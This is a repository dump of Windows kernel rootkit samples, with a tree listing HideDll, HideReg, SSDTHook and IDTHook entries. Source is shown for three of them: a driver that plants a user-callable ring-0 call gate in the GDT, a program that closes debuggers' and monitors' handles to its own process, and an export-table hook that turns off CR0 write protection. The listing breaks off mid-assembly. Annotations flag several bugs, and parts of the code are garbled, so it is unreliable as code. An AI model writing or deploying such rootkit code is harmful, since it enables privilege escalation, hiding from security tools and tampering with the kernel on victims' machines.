├── CALLGATE ├── main.c ├── makefile └── sources ├── ChangeModulePath.cpp ├── CloseMyHandle ├── CloseMyHandle.suo └── main.c ├── EAT Hook ├── main.c ├── main.h ├── makefile └── sources ├── GetNtoskrnlexe ├── ByZwQuerySystemInformation.c ├── FindDirect.c ├── makefile └── sources ├── HideDll ├── HideDllInMMVAD.c ├── main.c ├── makefile └── sources ├── HideReg.c ├── HookNtCreateSectionProtectProcess.c ├── HookZwQueryDirectoryFile ├── main.c ├── makefile ├── objfre_wxp_x86 │ └── i386 │ │ └── main.obj.oacr.root.x86fre.pft.xml └── sources ├── IDTCALL ├── main.c ├── makefile └── sources ├── IDTHook ├── IDTHook.c ├── makefile └── sources ├── IOMAP ├── IOMAP.suo ├── MAKEFILE ├── SOURCES └── main.c ├── IOMAP2 ├── main.c ├── makefile └── sources ├── IRPHook ├── main.c ├── makefile └── sources ├── Inline Hook ├── main.c ├── makefile └── sources ├── InlineHookObReferenced ├── main.c ├── makefile └── sources ├── KernelAndUserHook ├── main.c ├── makefile ├── pe.h └── sources ├── KillThread ├── LDasm.c ├── LDasm.h ├── main.c ├── makefile └── sources ├── PAGE_GURAD保护数据 ├── PEB.suo └── main.cpp ├── RPC ├── APCExec.c ├── Process.c ├── Process.h ├── makefile └── sources ├── Ring0ChangePEB ├── main.c ├── makefile └── sources ├── SSDTHook ├── SSDTHook.c ├── SSDTHook.h ├── makefile └── sources ├── SYSENTERHook ├── main.c ├── makefile └── sources ├── comfilter ├── main.c ├── makefile └── sources ├── 内核函数.txt ├── 分段机制.txt ├── 分页管理.txt ├── 天书夜读.txt └── 数据库专业课.txt /CALLGATE/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | 5 | #define GDT_LIMIT 0x3ff /* hard-coded 1 KiB GDT size; the real limit returned by sgdt (gdt[0..1]) is never consulted */ 6 | #define GATE_TYPE 0xEC /* descriptor type byte: P=1, DPL=3, S=0, type 0xC (32-bit call gate) */ 7 | 8 | typedef unsigned int DWORD; 9 | typedef unsigned char BYTE; 10 | typedef unsigned short WORD; 11 | 12 | char outString[] = "abcdefg"; /* argument pushed for the hard-coded callee in MyCALLGATE */ 13 | 14 | int now; /* byte offset of the GDT slot claimed by AddCallGate; reused by Unload, so only meaningful if a free slot was found */ 15 | /* 8-byte x86 call-gate descriptor: low/high 16 bits of the target offset, target code selector, parameter count, type/attribute byte. */ typedef struct _CALLGATE { 16 | WORD offsetl; 17 | WORD selector; 18 | BYTE count; 19 | BYTE type; 20 | WORD offseth; 21 | } CALLGATE, *PCALLGATE; 22 | 23 | 24 | 
/* Far-call target installed into a GDT slot by AddCallGate. Naked so no compiler prologue disturbs the far-call frame: saves state, calls a hard-coded kernel routine with outString as its argument, restores state and returns with retf. */ __declspec(naked) void MyCALLGATE() 25 | { 26 | __asm { 27 | cli; 28 | pushad; 29 | pushfd; 30 | mov eax, offset outString 31 | push eax 32 | mov eax, 80528e92h; /* absolute address baked in for one specific kernel build; on any other build this calls into unrelated code */ 33 | call eax; 34 | pop eax 35 | popfd; 36 | popad; 37 | sti; 38 | retf; 39 | } 40 | } 41 | 42 | /* Scans the GDT for the first descriptor with the Present bit clear and turns it into a DPL-3 call gate targeting MyCALLGATE (the DWORD parameter shadows that function's name). Records the claimed slot in the global `now`; always returns STATUS_SUCCESS, even when no slot was free. */ NTSTATUS AddCallGate(DWORD MyCALLGATE) 43 | { 44 | char s[256]; 45 | char gdt[6]; 46 | DWORD base; 47 | PCALLGATE pCallGate = NULL; 48 | 49 | now = 8; /* skip the null descriptor */ 50 | 51 | _asm sgdt gdt; 52 | base = *(DWORD*)(gdt + 2); /* only the base is read; the 16-bit limit in gdt[0..1] is ignored in favour of GDT_LIMIT */ 53 | 54 | while (now < GDT_LIMIT) /* if every slot is in use the loop ends with now == 0x400 and nothing is installed */ 55 | { 56 | pCallGate = (PCALLGATE)(base + now); 57 | if ((pCallGate->type & 0x80) == 0) /* P bit clear: slot unused */ 58 | { 59 | _snprintf(s, 256, "%08x\n", now|3); 60 | DbgPrint(s); /* non-literal format string; DbgPrint("%s", s) is the safe form even though s holds only hex digits here */ 61 | pCallGate->type = GATE_TYPE; 62 | pCallGate->offsetl = (WORD)((DWORD)MyCALLGATE & 0xFFFF); 63 | pCallGate->selector = 0x08; /* ring-0 code selector; with the DPL-3 gate type this leaves a user-reachable entry into ring 0 in the GDT for the driver's lifetime — GDT integrity checks would flag the descriptor */ 64 | pCallGate->offseth = (WORD)((DWORD)MyCALLGATE >> 16); 65 | pCallGate->count = 0; 66 | DbgPrint("Add call gate!\n"); 67 | break; 68 | } 69 | now += 8; 70 | } 71 | 72 | return STATUS_SUCCESS; 73 | } 74 | 75 | /* Clears the descriptor AddCallGate claimed. Unconditional: if AddCallGate found no free slot, `now` is 0x400 and this writes past GDT_LIMIT. */ void Unload(PDRIVER_OBJECT driver) 76 | { 77 | char gdt[6]; 78 | DWORD base; 79 | PCALLGATE pCallGate = NULL; 80 | 81 | _asm sgdt gdt; 82 | 83 | base = *(DWORD*)(gdt + 2); 84 | pCallGate = (PCALLGATE)(base + now); 85 | pCallGate->type = 0; 86 | DbgPrint("Unload!\n"); 87 | } 88 | 89 | NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg) 90 | { 91 | AddCallGate((DWORD)MyCALLGATE); /* result ignored (it is STATUS_SUCCESS either way) */ 92 | driver->DriverUnload = Unload; 93 | return STATUS_SUCCESS; 94 | } -------------------------------------------------------------------------------- /CALLGATE/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /CALLGATE/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=CALLGATE 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /ChangeModulePath.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/ChangeModulePath.cpp -------------------------------------------------------------------------------- /CloseMyHandle/CloseMyHandle.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/CloseMyHandle/CloseMyHandle.suo -------------------------------------------------------------------------------- /CloseMyHandle/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include /* the four angle-bracket header names were stripped from this copy */ 5 | 6 | typedef LONG NTSTATUS; 7 | typedef ULONG ACCESS_MASK; 8 | 9 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) /* defined but never tested: CloseMyHandle does not check the status of ZwQuerySystemInformation */ 10 | #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) 11 | #define NT_SUCCESS(status) ((NTSTATUS)status >= 0) /* argument not parenthesized; an expression argument would be cast only in part */ 12 | 13 | 14 | /* Hand-rolled equivalent of the DDK InitializeObjectAttributes: fills an OBJECT_ATTRIBUTES for the ZwOpenProcess/ZwOpenThread calls below. */ #define InitializeObjectAttributes( p, n, a, r, s) \ 15 | { \ 16 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 17 | (p)->RootDirectory = r; (p)->Attributes = a;\ 18 | (p)->ObjectName = n; \ 19 | (p)->SecurityDescriptor = s; \ 20 | (p)->SecurityQualityOfService = NULL; \ 21 | } 22 | 
23 | /* Hand-copied SYSTEM_INFORMATION_CLASS (values 0..53 in declaration order). Only SystemHandleInformation (16) is used by this file. */ typedef enum _SYSTEM_INFORMATION_CLASS 24 | { 25 | SystemBasicInformation, // 00 Y N 26 | SystemProcessorInformation, // 01 Y N 27 | SystemPerformanceInformation, // 02 Y N 28 | SystemTimeOfDayInformation, // 03 Y N 29 | SystemNotImplemented1, // 04 Y N 30 | SystemProcessesAndThreadsInformation, // 05 Y N 31 | SystemCallCounts, // 06 Y N 32 | SystemConfigurationInformation, // 07 Y N 33 | SystemProcessorTimes, // 08 Y N 34 | SystemGlobalFlag, // 09 Y Y 35 | SystemNotImplemented2, // 10 Y N 36 | SystemModuleInformation, // 11 Y N 37 | SystemLockInformation, // 12 Y N 38 | SystemNotImplemented3, // 13 Y N 39 | SystemNotImplemented4, // 14 Y N 40 | SystemNotImplemented5, // 15 Y N 41 | SystemHandleInformation, // 16 Y N 42 | SystemObjectInformation, // 17 Y N 43 | SystemPagefileInformation, // 18 Y N 44 | SystemInstructionEmulationCounts, // 19 Y N 45 | SystemInvalidInfoClass1, // 20 46 | SystemCacheInformation, // 21 Y Y 47 | SystemPoolTagInformation, // 22 Y N 48 | SystemProcessorStatistics, // 23 Y N 49 | SystemDpcInformation, // 24 Y Y 50 | SystemNotImplemented6, // 25 Y N 51 | SystemLoadImage, // 26 N Y 52 | SystemUnloadImage, // 27 N Y 53 | SystemTimeAdjustment, // 28 Y Y 54 | SystemNotImplemented7, // 29 Y N 55 | SystemNotImplemented8, // 30 Y N 56 | SystemNotImplemented9, // 31 Y N 57 | SystemCrashDumpInformation, // 32 Y N 58 | SystemExceptionInformation, // 33 Y N 59 | SystemCrashDumpStateInformation, // 34 Y Y/N 60 | SystemKernelDebuggerInformation, // 35 Y N 61 | SystemContextSwitchInformation, // 36 Y N 62 | SystemRegistryQuotaInformation, // 37 Y Y 63 | SystemLoadAndCallImage, // 38 N Y 64 | SystemPrioritySeparation, // 39 N Y 65 | SystemNotImplemented10, // 40 Y N 66 | SystemNotImplemented11, // 41 Y N 67 | SystemInvalidInfoClass2, // 42 68 | SystemInvalidInfoClass3, // 43 69 | SystemTimeZoneInformation, // 44 Y N 70 | SystemLookasideInformation, // 45 Y N 71 | SystemSetTimeSlipEvent, // 46 N Y 72 | SystemCreateSession, // 47 N Y 73 | 
SystemDeleteSession, // 48 N Y 74 | SystemInvalidInfoClass4, // 49 75 | SystemRangeStartInformation, // 50 Y N 76 | SystemVerifierInformation, // 51 Y Y 77 | SystemAddVerifier, // 52 N Y 78 | SystemSessionProcessesInformation // 53 Y N 79 | } SYSTEM_INFORMATION_CLASS; 80 | 81 | /* One entry of the SystemHandleInformation result (32-bit layout, 16 bytes). PID and handle value are 16-bit, which is why CloseMyHandle truncates its own handles to USHORT when comparing. */ typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { 82 | USHORT UniqueProcessId; 83 | USHORT CreatorBackTraceIndex; 84 | UCHAR ObjectTypeIndex; 85 | UCHAR HandleAttributes; 86 | USHORT HandleValue; 87 | PVOID Object; 88 | ULONG GrantedAccess; 89 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 90 | 91 | typedef struct _UNICODE_STRING { 92 | USHORT Length; 93 | USHORT MaximumLength; 94 | PWSTR Buffer; 95 | } UNICODE_STRING,*PUNICODE_STRING; 96 | 97 | typedef struct _OBJECT_ATTRIBUTES { 98 | ULONG Length; 99 | HANDLE RootDirectory; 100 | PUNICODE_STRING ObjectName; 101 | ULONG Attributes; 102 | PVOID SecurityDescriptor; 103 | PVOID SecurityQualityOfService; 104 | } OBJECT_ATTRIBUTES,*POBJECT_ATTRIBUTES; 105 | 106 | /* Process/thread id pair passed to ZwOpenProcess/ZwOpenThread. */ typedef struct _CLIENT_ID { 107 | HANDLE UniqueProcess; 108 | HANDLE UniqueThread; 109 | } CLIENT_ID,*PCLIENT_ID; 110 | 111 | /* Object type indices; declared but not referenced anywhere in this file. */ typedef enum _SYSTEM_HANDLE_TYPE 112 | { 113 | OB_TYPE_UNKNOWN, //0 114 | OB_TYPE_TYPE, //1 115 | OB_TYPE_DIRECTORY, //2 116 | OB_TYPE_SYMBOLIC_LINK,//3 117 | OB_TYPE_TOKEN, //4 118 | OB_TYPE_PROCESS, //5 119 | OB_TYPE_THREAD, //6 120 | OB_TYPE_UNKNOWN_7, //7 121 | OB_TYPE_EVENT, //8 122 | OB_TYPE_EVENT_PAIR, //9 123 | OB_TYPE_MUTANT, //10 124 | OB_TYPE_UNKNOWN_11, //11 125 | OB_TYPE_SEMAPHORE, //12 126 | OB_TYPE_TIMER, //13 127 | OB_TYPE_PROFILE, //14 128 | OB_TYPE_WINDOW_STATION,//15 129 | OB_TYPE_DESKTOP, //16 130 | OB_TYPE_SECTION, //17 131 | OB_TYPE_KEY, //18 132 | OB_TYPE_PORT, //19 133 | OB_TYPE_WAITABLE_PORT,//20 134 | OB_TYPE_UNKNOWN_21, 135 | OB_TYPE_UNKNOWN_22, 136 | OB_TYPE_UNKNOWN_23, 137 | OB_TYPE_UNKNOWN_24, 138 | OB_TYPE_IO_COMPLETION,//25 139 | OB_TYPE_FILE //26 140 | } SYSTEM_HANDLE_TYPE; 141 | 142 | typedef NTSTATUS 143 | 
(__stdcall *ZWQUERYSYSTEMINFORMATION ) ( 144 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 145 | PVOID SystemInformation, 146 | ULONG SystemInformationLength, 147 | PULONG ReturnLength OPTIONAL 148 | ); /* function-pointer types for the ntdll exports that main() resolves at runtime */ 149 | 150 | 151 | typedef NTSTATUS 152 | (__stdcall *ZWOPENPROCESS) ( 153 | PHANDLE ProcessHandle, 154 | ULONG DesiredAccess, 155 | POBJECT_ATTRIBUTES ObjectAttributes, 156 | PCLIENT_ID ClientId 157 | ); 158 | 159 | typedef NTSTATUS 160 | (__stdcall *ZWALLOCATEVIRTUALMEMORY) ( 161 | HANDLE ProcessHandle, 162 | PVOID *BaseAddress, 163 | ULONG ZeroBits, 164 | PSIZE_T RegionSize, /* CloseMyHandle passes &nBufferLen, a DWORD — only correct where SIZE_T is 32 bits */ 165 | ULONG AllocationType, 166 | ULONG Protect 167 | ); 168 | 169 | 170 | typedef NTSTATUS 171 | (__stdcall *ZWFREEVIRTUALMEMORY)( 172 | HANDLE ProcessHandle, 173 | PVOID *BaseAddress, 174 | PSIZE_T RegionSize, 175 | ULONG FreeType 176 | ); 177 | 178 | typedef NTSTATUS 179 | (__stdcall *ZWOPENTHREAD)( 180 | PHANDLE ThreadHandle, 181 | ACCESS_MASK DesiredAccess, 182 | POBJECT_ATTRIBUTES ObjectAttributes, 183 | PCLIENT_ID ClientId 184 | ); 185 | 186 | typedef NTSTATUS 187 | (__stdcall *ZWDUPLICATEOBJECT)( 188 | HANDLE SourceProcessHandle, 189 | HANDLE SourceHandle, 190 | HANDLE TargetProcessHandle, 191 | PHANDLE TargetHandle, 192 | ACCESS_MASK DesiredAccess, 193 | ULONG HandleAttributes, 194 | ULONG Options 195 | ); 196 | 197 | typedef NTSTATUS 198 | (__stdcall *ZWCLOSE)( 199 | HANDLE Handle 200 | ); 201 | 202 | typedef DWORD 203 | (__stdcall *RTLNTSTATUSTODOSERROR)( 204 | NTSTATUS status 205 | ); 206 | 207 | /* Filled by GetProcAddress in main(); NULL until then, and main() never checks the lookups. */ ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation; 208 | ZWOPENPROCESS ZwOpenProcess; 209 | ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory; 210 | ZWFREEVIRTUALMEMORY ZwFreeVirtualMemory; 211 | ZWOPENTHREAD ZwOpenThread; 212 | ZWDUPLICATEOBJECT ZwDuplicateObject; 213 | ZWCLOSE ZwClose; 214 | RTLNTSTATUSTODOSERROR RtlNtStatusToDosError; 215 | 216 | PSYSTEM_HANDLE_TABLE_ENTRY_INFO pHandleInfo; /* file-scope cursor used only inside CloseMyHandle */ 217 | 218 | DWORD pGetProcessId(void); /* naked TEB readers defined near the end of the file */ 219 | DWORD pGetThreadId(void); 220 | 221 | void 
/* Prints a readable message for an NTSTATUS. Unused in this file; FormatMessage's result is not checked, so errMsg may be uninitialized when printed and passed to LocalFree. */ PrintZwError(char* message, NTSTATUS status) 222 | { 223 | char *errMsg; 224 | FormatMessage( 225 | FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM, 226 | NULL, 227 | RtlNtStatusToDosError(status),MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 228 | (LPTSTR)&errMsg, 229 | 0, 230 | NULL); 231 | printf("%s: %s Error code=0x%08x\n", message, errMsg, status); 232 | LocalFree(errMsg); 233 | } 234 | 235 | /* Locates the kernel objects behind this process's own process and thread handles, then walks the system handle table and closes (DUPLICATE_CLOSE_SOURCE) every other process's handle to those objects. Closing handles that debuggers or monitoring tools hold is the effect; a process doing this is a strong anti-analysis signal worth alerting on. */ void CloseMyHandle() 236 | { 237 | HANDLE hCurProcess, hSrcProcessHandle, hDstHandle; 238 | HANDLE hMyProcess = INVALID_HANDLE_VALUE, hMyThread = INVALID_HANDLE_VALUE; 239 | DWORD nBufferLen = 0x40000, nRetLen = 0; /* fixed 256 KiB buffer; nRetLen is never read back */ 240 | DWORD HandleCount, NumberOfHandles; 241 | DWORD pMyProcessObject = 0, pMyThreadObject = 0, pObject; 242 | CLIENT_ID myCid, tmpCid; 243 | PVOID pBuffer = NULL; 244 | NTSTATUS status; 245 | OBJECT_ATTRIBUTES ObjectAttributes; 246 | 247 | myCid.UniqueProcess = (HANDLE)pGetProcessId(); 248 | myCid.UniqueThread = (HANDLE)pGetThreadId(); /* pGetThreadId reads the same TEB field as pGetProcessId (see its definition), so this is presumably the PID and ZwOpenThread below cannot match a thread */ 249 | InitializeObjectAttributes( 250 | &ObjectAttributes, 251 | NULL, 252 | 0, 253 | NULL, 254 | NULL); 255 | status = ZwOpenProcess( 256 | &hMyProcess, 257 | PROCESS_ALL_ACCESS, 258 | &ObjectAttributes, 259 | &myCid ); 260 | status= ZwOpenThread( 261 | &hMyThread, 262 | THREAD_ALL_ACCESS, 263 | &ObjectAttributes, 264 | &myCid); /* neither open is checked; on failure the handle keeps INVALID_HANDLE_VALUE and its truncated value is what the table scan compares against */ 265 | printf("Process: %0x, Thread: %08x\n", 266 | hMyProcess, 267 | hMyThread); /* "%0x" lacks a width — presumably "%08x" */ 268 | 269 | hCurProcess = GetCurrentProcess(); 270 | status = ZwAllocateVirtualMemory( 271 | hCurProcess, 272 | &pBuffer, 273 | 0, 274 | &nBufferLen, 275 | MEM_COMMIT, 276 | PAGE_READWRITE); 277 | if (!NT_SUCCESS(status)) 278 | { 279 | printf("Allocate memory failed!\n"); 280 | return; 281 | } 282 | printf("Allocate memory: %08x\n", pBuffer); 283 | 284 | status = ZwQuerySystemInformation( 285 | SystemHandleInformation, 286 | pBuffer, 287 | nBufferLen, 288 | &nRetLen); /* status not checked: a handle table larger than nBufferLen fails with STATUS_INFO_LENGTH_MISMATCH and HandleCount is then read from the untouched, freshly committed buffer; the call should be retried with a larger buffer */ 289 | printf("Searching handles......\n"); 290 | HandleCount = *(DWORD*)pBuffer; 291 | printf("Handle count: %d\n", HandleCount); 292 | 
printf("Memory need: 0x%08x\n", 293 | HandleCount * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO)+4); 294 | 295 | if (HandleCount > 1) /* pass 1: find the kernel objects behind our own two handles; "> 1" skips a table with exactly one entry while pass 2 uses ">= 1" */ 296 | { 297 | NumberOfHandles = *(DWORD*)pBuffer; 298 | pHandleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO) 299 | ((char*)pBuffer + sizeof(DWORD)); 300 | do 301 | { 302 | if ( pHandleInfo->HandleValue == (USHORT)hMyThread) /* 16-bit comparison, qualified by owner PID below */ 303 | { 304 | if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 305 | { 306 | pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); /* kernel object address read as a 32-bit value */ 307 | printf("Thread found!\n"); 308 | } 309 | } 310 | if ( pHandleInfo->HandleValue == (USHORT)hMyProcess) 311 | { 312 | if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 313 | { 314 | pMyProcessObject = *(DWORD*)&(pHandleInfo->Object); 315 | printf("Process found!\n"); 316 | } 317 | } 318 | ++pHandleInfo; 319 | --NumberOfHandles; 320 | } while (NumberOfHandles); 321 | } 322 | 323 | ZwClose(hMyProcess); 324 | ZwClose(hMyThread); 325 | printf("Start close......\n"); 326 | 327 | if (HandleCount >=1 ) /* pass 2: close every remaining handle to those objects, whoever owns it */ 328 | { 329 | pHandleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO) 330 | ((char*)pBuffer + sizeof(DWORD)); 331 | do 332 | { 333 | pObject = *(DWORD*)&(pHandleInfo->Object); 334 | 335 | if (pObject == pMyProcessObject || pObject == pMyThreadObject) /* when pass 1 found nothing both are 0 and only entries with a NULL Object would match */ 336 | { 337 | printf("Found handle=0x%08x OwnerPID = %4d\n", 338 | pHandleInfo->HandleValue, 339 | pHandleInfo->UniqueProcessId); 340 | tmpCid.UniqueProcess = (HANDLE)pHandleInfo->UniqueProcessId; 341 | tmpCid.UniqueThread = 0; 342 | InitializeObjectAttributes(&ObjectAttributes, 343 | NULL, 344 | 0, 345 | NULL, 346 | NULL); 347 | status = ZwOpenProcess( 348 | &hSrcProcessHandle, 349 | PROCESS_DUP_HANDLE, 350 | &ObjectAttributes, 351 | &tmpCid ); 352 | if (!status) /* accepts only STATUS_SUCCESS (0); NT_SUCCESS() defined above would also accept informational codes */ 353 | { 354 | status = ZwDuplicateObject( 355 | hSrcProcessHandle, 356 | (void*)pHandleInfo->HandleValue, 357 | hCurProcess, 358 | &hDstHandle, 359 | 0, 360 | 0, 361 | DUPLICATE_CLOSE_SOURCE); /* closes the handle inside the owning process — including one held by a debugger or security tool */ 362 | if (!status) 363 | { 364 | ZwClose(hDstHandle); 365 | printf("close 
handle\n"); 366 | } 367 | ZwClose(hSrcProcessHandle); 368 | } 369 | } 370 | ++pHandleInfo; 371 | --HandleCount; 372 | } while (HandleCount); 373 | } 374 | ZwFreeVirtualMemory( 375 | hCurProcess, 376 | &pBuffer, 377 | &nBufferLen, 378 | MEM_RELEASE); /* status ignored */ 379 | } 380 | 381 | /* Enables SeDebugPrivilege in this process's token so ZwOpenProcess(PROCESS_DUP_HANDLE) on other processes can succeed. None of the three API calls is checked, so an unprivileged caller proceeds without noticing. */ void EnableDebugPriv() 382 | { 383 | HANDLE hToken; 384 | LUID uid; 385 | TOKEN_PRIVILEGES tkp; 386 | OpenProcessToken( 387 | GetCurrentProcess(), 388 | TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, 389 | &hToken); 390 | LookupPrivilegeValue(NULL, 391 | SE_DEBUG_NAME, 392 | &uid); 393 | tkp.PrivilegeCount = 1; 394 | tkp.Privileges[0].Luid = uid; 395 | tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 396 | AdjustTokenPrivileges(hToken,FALSE, &tkp, 397 | sizeof(tkp), NULL, NULL); 398 | CloseHandle(hToken); 399 | } 400 | 401 | /* Returns the current PID: TEB via fs:[0x18], then ClientId.UniqueProcess at TEB+0x20 (x86). */ DWORD __declspec(naked) pGetProcessId() 402 | { 403 | __asm 404 | { 405 | mov eax, fs:[0x18]; 406 | mov eax,[eax + 0x20]; 407 | retn; 408 | } 409 | } 410 | 411 | /* BUG: identical to pGetProcessId — reads TEB+0x20 (UniqueProcess). The thread id is the next field, ClientId.UniqueThread at TEB+0x24, so as written this returns the PID. */ DWORD __declspec(naked) pGetThreadId() 412 | { 413 | __asm 414 | { 415 | mov eax, fs:[0x18]; 416 | mov eax, [eax+0x20]; 417 | retn; 418 | } 419 | } 420 | 421 | /* Resolves the Zw* entry points from ntdll at runtime (neither LoadLibrary nor any GetProcAddress result is checked), enables SeDebugPrivilege, then runs CloseMyHandle. */ int main() 422 | { 423 | HANDLE h; 424 | HMODULE hDll = LoadLibrary(L"ntdll.dll"); 425 | ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hDll,"ZwQuerySystemInformation"); 426 | ZwOpenProcess = (ZWOPENPROCESS)GetProcAddress(hDll,"ZwOpenProcess"); 427 | ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hDll,"ZwAllocateVirtualMemory"); 428 | ZwFreeVirtualMemory = (ZWFREEVIRTUALMEMORY)GetProcAddress(hDll,"ZwFreeVirtualMemory"); 429 | ZwOpenThread = (ZWOPENTHREAD)GetProcAddress(hDll,"ZwOpenThread"); 430 | ZwDuplicateObject = (ZWDUPLICATEOBJECT)GetProcAddress(hDll,"ZwDuplicateObject"); 431 | ZwClose = (ZWCLOSE)GetProcAddress(hDll,"ZwClose"); 432 | RtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hDll,"RtlNtStatusToDosError"); 433 | 434 | EnableDebugPriv(); 435 | h = OpenProcess( 436 | PROCESS_QUERY_INFORMATION, 437 | 0, 438 | 
GetProcessId(NULL)); /* GetProcessId(NULL) fails and yields 0, so this asks for PID 0; h is only printed and never closed — presumably GetCurrentProcessId() was intended */ 439 | printf("Handle := %08x\n", h); 440 | CloseMyHandle(); 441 | FreeLibrary(hDll); 442 | printf("End.\n"); 443 | return 0; 444 | } -------------------------------------------------------------------------------- /EAT Hook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "main.h" 3 | #pragma comment(lib, "ntdll.lib") 4 | 5 | #define FUNCNAME "PsGetCurrentProcessId" 6 | DWORD old, count = 0; /* old: original address of the hooked export (0 until Hook(1) stores it); count: calls observed through NewFunction */ 7 | typedef HANDLE (*FUNCTION)(); 8 | 9 | /* Replacement export: counts the call and forwards to the original. Calls through `old`, so it faults if reached while old is still 0. */ HANDLE NewFunction() 10 | { 11 | count++; 12 | return ((FUNCTION)old)(); 13 | } 14 | 15 | /* Looks up a loaded kernel module by file name via SystemModuleInformation and returns its image base, or 0 when not found or on error. */ DWORD GetModuleBaseAddress(PBYTE ModuleName) 16 | { 17 | NTSTATUS status; 18 | DWORD size = 0, index; 19 | PDWORD buffer; 20 | PSYSTEM_MODULE_INFORMATION module; 21 | DWORD ModuleAddress = 0; 22 | 23 | ZwQuerySystemInformation( 24 | SystemModuleInformation, 25 | NULL, 26 | &size, /* a pointer is passed where a ULONG length is expected; the call relies on the kernel still reporting the required size through the last argument */ 27 | &size); 28 | if (size == 0) 29 | { 30 | DbgPrint("SystemModuleInformation length cannot be defined!\n"); 31 | return 0; 32 | } 33 | buffer = ExAllocatePool(NonPagedPool, size); 34 | if (!buffer) 35 | { 36 | DbgPrint("ExAllocatePool error!\n"); 37 | return 0; 38 | } 39 | status = ZwQuerySystemInformation( 40 | SystemModuleInformation, 41 | buffer, 42 | size, 43 | 0); 44 | if (status != STATUS_SUCCESS) 45 | { 46 | DbgPrint("Query Information error!\n"); 47 | return 0; /* leaks buffer: ExFreePool is skipped on this path */ 48 | } 49 | module = (PSYSTEM_MODULE_INFORMATION)((PDWORD)buffer + 1); 50 | for (index = 0; index < *buffer; index++) 51 | { 52 | if (_stricmp(module[index].ImageName + module[index].ModuleNameOffset, 53 | ModuleName) == 0) 54 | { 55 | ModuleAddress = (DWORD)module[index].Base; /* no break: the last matching module wins */ 56 | DbgPrint("Module found at: %08x\n", ModuleAddress); 57 | } 58 | } 59 | ExFreePool(buffer); 60 | return ModuleAddress; 61 | } 62 | 63 | /* Installs (hook != 0) or removes (hook == 0) the export-table redirection of FUNCNAME in ntkrnlpa.exe; the body continues on the following listing line. */ VOID Hook(BOOLEAN hook) 64 | { 65 | DWORD base, index, addr = 0, i; 66 | PIMAGE_DOS_HEADER pDosHeader; 67 | PIMAGE_NT_HEADERS pNtHeader; 68 | PIMAGE_EXPORT_DIRECTORY exports; 69 | 70 | PBYTE 
pFuncName = NULL; 71 | PDWORD pAddressOfFunction, pAddressOfNames; 72 | PWORD pAddressOfNameOdrinals; 73 | 74 | base = GetModuleBaseAddress("ntkrnlpa.exe"); /* 0 when the running kernel is not named ntkrnlpa.exe (e.g. ntoskrnl.exe); base is dereferenced below before the addr == 0 check */ 75 | DbgPrint("base: %08x\n", base); 76 | 77 | pDosHeader = (PIMAGE_DOS_HEADER)base; 78 | pNtHeader = (PIMAGE_NT_HEADERS)(base + pDosHeader->e_lfanew); 79 | exports = (PIMAGE_EXPORT_DIRECTORY)(base + 80 | pNtHeader->OptionalHeader.DataDirectory[0].VirtualAddress); /* DataDirectory[0] == IMAGE_DIRECTORY_ENTRY_EXPORT */ 81 | 82 | pAddressOfFunction = (PDWORD)(base + exports->AddressOfFunctions); 83 | pAddressOfNames = (PDWORD)(base + exports->AddressOfNames); 84 | pAddressOfNameOdrinals = (PWORD)(base + exports->AddressOfNameOrdinals); 85 | 86 | for (i = 0; iNumberOfNames; i++) /* garbled in this copy; presumably i < exports->NumberOfNames */ 87 | { 88 | index = pAddressOfFunction[i]; /* BUG: reads a function RVA as the slot index; the name-to-slot mapping is pAddressOfNameOdrinals[i], computed above and otherwise unused */ 89 | pFuncName = (PBYTE)(base + pAddressOfNames[i]); 90 | if (_stricmp(pFuncName, FUNCNAME) == 0) 91 | { 92 | addr = base + (DWORD)pAddressOfFunction[index]; 93 | break; 94 | } 95 | } 96 | 97 | if (addr == 0) 98 | { 99 | DbgPrint("addr is 0\n"); 100 | return; 101 | } 102 | 103 | if (hook) 104 | { 105 | _asm 106 | { 107 | cli; 108 | mov eax, cr0; 109 | and eax, not 10000h; 110 | mov cr0, eax; 111 | sti; 112 | 